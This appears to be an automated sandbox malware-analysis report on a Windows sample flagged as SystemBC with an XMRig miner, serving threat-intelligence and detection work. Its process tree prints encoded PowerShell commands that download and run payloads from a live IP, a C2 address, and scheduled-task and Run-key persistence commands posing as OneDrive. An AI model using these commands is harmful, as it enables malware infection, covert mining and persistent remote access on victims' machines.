systembc | d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97

Analysis

max time kernel
122s
max time network
149s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
04-05-2023 11:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

95KB
MD5

92e79e8ed958f7289702c96fe03de5a5
SHA1

e16dede58a351b4bcc4e7b973fdec6c3ec3e98ce
SHA256

d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
SHA512

fa0225f2f28eefd066a4d803586f7edcd3416b05c64ee6070e3d55a327ba7d68d245b7f669975d9aa34d7edc3a585fe05e633a38dfa19469488c58e09b832943
SSDEEP

1536:BfbO0u8DiUPCrElGBWHNC68MVlPjgNJiWUex4bmR+w/Y2tKSG8xB2ncSVKC29m+l:VbEUPCrElGsHNC68MVlPjgNJiWUexfNh

Score

10^/10

systembc xmrig evasion miner persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/o.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/file.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/r.png

Extracted

Family

systembc

185.161.248.16:4440

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

Processes:

OneDrive.exeOneDrive.exe

description	pid	process	target process
PID 1536 created 1264	1536	OneDrive.exe	Explorer.EXE
PID 1536 created 1264	1536	OneDrive.exe	Explorer.EXE
PID 1536 created 1264	1536	OneDrive.exe	Explorer.EXE
PID 1696 created 1264	1696	OneDrive.exe	Explorer.EXE
PID 1696 created 1264	1696	OneDrive.exe	Explorer.EXE
PID 1696 created 1264	1696	OneDrive.exe	Explorer.EXE
PID 1696 created 1264	1696	OneDrive.exe	Explorer.EXE

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dllhost.exe

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1696-168-0x000000013F250000-0x000000013FC1A000-memory.dmp	xmrig
behavioral1/memory/1696-170-0x000000013F250000-0x000000013FC1A000-memory.dmp	xmrig
behavioral1/memory/768-178-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/768-185-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/768-190-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/768-194-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/768-198-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/768-202-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/768-206-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/768-210-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/768-214-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

5 1400 powershell.exe
6 1708 powershell.exe
7 1664 powershell.exe
10 1400 powershell.exe
11 1400 powershell.exe
Downloads MZ/PE file

flow	pid	process
5	1400	powershell.exe
6	1708	powershell.exe
7	1664	powershell.exe
10	1400	powershell.exe
11	1400	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dllhost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dllhost.exe

Executes dropped EXE 5 IoCs

Processes:

OneDrive.exedllhost.exeOneDrive.exelsass.exelsass.exe

pid process

1536 OneDrive.exe
2016 dllhost.exe
1696 OneDrive.exe
1564 lsass.exe
428 lsass.exe
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Wine dllhost.exe
Loads dropped DLL 3 IoCs

Processes:

powershell.exetaskeng.exelsass.exe

pid process

1400 powershell.exe
828 taskeng.exe
1564 lsass.exe

pid	process
1536	OneDrive.exe
2016	dllhost.exe
1696	OneDrive.exe
1564	lsass.exe
428	lsass.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Wine	dllhost.exe

pid	process
1400	powershell.exe
828	taskeng.exe
1564	lsass.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

lsass.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe"	lsass.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

dllhost.exelsass.exelsass.exe

pid process

2016 dllhost.exe
1564 lsass.exe
428 lsass.exe
428 lsass.exe
428 lsass.exe
428 lsass.exe
428 lsass.exe
428 lsass.exe

pid	process
2016	dllhost.exe
1564	lsass.exe
428	lsass.exe
428	lsass.exe
428	lsass.exe
428	lsass.exe
428	lsass.exe
428	lsass.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

OneDrive.exe

description	pid	process	target process
PID 1696 set thread context of 1260	1696	OneDrive.exe	conhost.exe
PID 1696 set thread context of 768	1696	OneDrive.exe	conhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1920 schtasks.exe
816 schtasks.exe
1592 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1608 timeout.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

lsass.exe

pid process

428 lsass.exe

pid	process
1920	schtasks.exe
816	schtasks.exe
1592	schtasks.exe

pid	process
1608	timeout.exe

pid	process
428	lsass.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeOneDrive.exepowershell.exedllhost.exeOneDrive.exepowershell.exe

pid	process
1664	powershell.exe
1708	powershell.exe
1180	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1536	OneDrive.exe
1536	OneDrive.exe
1536	OneDrive.exe
1536	OneDrive.exe
1184	powershell.exe
1536	OneDrive.exe
1536	OneDrive.exe
1400	powershell.exe
1400	powershell.exe
2016	dllhost.exe
1400	powershell.exe
1400	powershell.exe
1696	OneDrive.exe
1696	OneDrive.exe
1696	OneDrive.exe
1696	OneDrive.exe
1664	powershell.exe
1696	OneDrive.exe
1696	OneDrive.exe
1696	OneDrive.exe
1696	OneDrive.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exelsass.exelsass.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeShutdownPrivilege	672	powercfg.exe
Token: SeShutdownPrivilege	1804	powercfg.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeShutdownPrivilege	2032	powercfg.exe
Token: SeShutdownPrivilege	816	powercfg.exe
Token: SeShutdownPrivilege	868	powercfg.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeShutdownPrivilege	1532	powercfg.exe
Token: SeShutdownPrivilege	1440	powercfg.exe
Token: SeShutdownPrivilege	1920	powercfg.exe
Token: SeDebugPrivilege	1564	lsass.exe
Token: SeDebugPrivilege	428	lsass.exe
Token: SeLockMemoryPrivilege	768	conhost.exe
Token: SeLockMemoryPrivilege	768	conhost.exe

Suspicious use of FindShellTrayWindow 59 IoCs

Processes:

conhost.exe

pid	process
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe

Suspicious use of SendNotifyMessage 59 IoCs

Processes:

conhost.exe

pid	process
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe
768	conhost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

lsass.exelsass.exe

pid process

1564 lsass.exe
428 lsass.exe

pid	process
1564	lsass.exe
428	lsass.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exepowershell.execmd.exepowershell.exetaskeng.execmd.exepowershell.exeOneDrive.exelsass.exe

description	pid	process	target process
PID 1416 wrote to memory of 1180	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1180	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1180	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1708	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1708	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1708	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1400	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1400	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1400	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1664	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1664	1416	file.exe	powershell.exe
PID 1416 wrote to memory of 1664	1416	file.exe	powershell.exe
PID 1400 wrote to memory of 1536	1400	powershell.exe	OneDrive.exe
PID 1400 wrote to memory of 1536	1400	powershell.exe	OneDrive.exe
PID 1400 wrote to memory of 1536	1400	powershell.exe	OneDrive.exe
PID 1992 wrote to memory of 672	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 672	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 672	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 1804	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 1804	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 1804	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 2032	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 2032	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 2032	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 816	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 816	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 816	1992	cmd.exe	powercfg.exe
PID 1184 wrote to memory of 1920	1184	powershell.exe	schtasks.exe
PID 1184 wrote to memory of 1920	1184	powershell.exe	schtasks.exe
PID 1184 wrote to memory of 1920	1184	powershell.exe	schtasks.exe
PID 1400 wrote to memory of 2016	1400	powershell.exe	dllhost.exe
PID 1400 wrote to memory of 2016	1400	powershell.exe	dllhost.exe
PID 1400 wrote to memory of 2016	1400	powershell.exe	dllhost.exe
PID 1400 wrote to memory of 2016	1400	powershell.exe	dllhost.exe
PID 828 wrote to memory of 1696	828	taskeng.exe	OneDrive.exe
PID 828 wrote to memory of 1696	828	taskeng.exe	OneDrive.exe
PID 828 wrote to memory of 1696	828	taskeng.exe	OneDrive.exe
PID 1400 wrote to memory of 1564	1400	powershell.exe	lsass.exe
PID 1400 wrote to memory of 1564	1400	powershell.exe	lsass.exe
PID 1400 wrote to memory of 1564	1400	powershell.exe	lsass.exe
PID 1400 wrote to memory of 1564	1400	powershell.exe	lsass.exe
PID 1288 wrote to memory of 868	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 868	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 868	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 1532	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 1532	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 1532	1288	cmd.exe	powercfg.exe
PID 1664 wrote to memory of 816	1664	powershell.exe	schtasks.exe
PID 1664 wrote to memory of 816	1664	powershell.exe	schtasks.exe
PID 1664 wrote to memory of 816	1664	powershell.exe	schtasks.exe
PID 1288 wrote to memory of 1440	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 1440	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 1440	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 1920	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 1920	1288	cmd.exe	powercfg.exe
PID 1288 wrote to memory of 1920	1288	cmd.exe	powercfg.exe
PID 1696 wrote to memory of 1260	1696	OneDrive.exe	conhost.exe
PID 1564 wrote to memory of 1592	1564	lsass.exe	schtasks.exe
PID 1564 wrote to memory of 1592	1564	lsass.exe	schtasks.exe
PID 1564 wrote to memory of 1592	1564	lsass.exe	schtasks.exe
PID 1564 wrote to memory of 1592	1564	lsass.exe	schtasks.exe
PID 1564 wrote to memory of 428	1564	lsass.exe	lsass.exe
PID 1564 wrote to memory of 428	1564	lsass.exe	lsass.exe
PID 1564 wrote to memory of 428	1564	lsass.exe	lsass.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1264

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1400

C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1536

C:\Users\Admin\AppData\Roaming\dllhost.exe
"C:\Users\Admin\AppData\Roaming\dllhost.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2016

C:\Users\Admin\AppData\Roaming\lsass.exe
"C:\Users\Admin\AppData\Roaming\lsass.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 13:10 /du 23:59 /sc daily /ri 1 /f
5⤵
- Creates scheduled task(s)
PID:1592

C:\ProgramData\lsass\lsass.exe
"C:\ProgramData\lsass\lsass.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:428

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA989.tmp.bat""
5⤵
PID:1584

C:\Windows\SysWOW64\timeout.exe
timeout 7
6⤵
- Delays execution with timeout.exe
PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:672

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1804

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:1920

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
2⤵
PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:816

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
PID:1260

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:768

C:\Windows\system32\taskeng.exe
taskeng.exe {C219F00C-7260-46AB-A9D1-83941C8C8B17} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:828

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1696

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\lsass\lsass.exe
Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
C:\ProgramData\lsass\lsass.exe
Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA989.tmp.bat
Filesize
154B

MD5
624df1ecf47fbd499519285daf3e1907

SHA1
0e77aeee8babbee2978da6574c74259179eb7ad8

SHA256
6909aab83725828dc29cb330c8db11ac52df37d5f154a09484bad1f7992e42b5

SHA512
637539b7abf9313d1cfd9473f90007b122a2ced300080c195761552fc978c51c83827ca9679ee57c8487d91d0b167d9859bb7fa89256a99c7e7de0f44100a72d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA989.tmp.bat
Filesize
154B

MD5
624df1ecf47fbd499519285daf3e1907

SHA1
0e77aeee8babbee2978da6574c74259179eb7ad8

SHA256
6909aab83725828dc29cb330c8db11ac52df37d5f154a09484bad1f7992e42b5

SHA512
637539b7abf9313d1cfd9473f90007b122a2ced300080c195761552fc978c51c83827ca9679ee57c8487d91d0b167d9859bb7fa89256a99c7e7de0f44100a72d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
28640bbef264e58d9169b7945ba04609

SHA1
42d7ab521cdd7f3ec35ff0f9f86ff4db728b3be3

SHA256
c35a1eeb6eb591836022a5949a181d276736be75054530d82c44c5e4ff239702

SHA512
9add481b594b315878b4bbe52ac81a86b99f734e888db47985040d666267383a5449f8acb97c6795268d4b62ba110765fd69d785fed935b86b27d58224fbf470

Download Submit
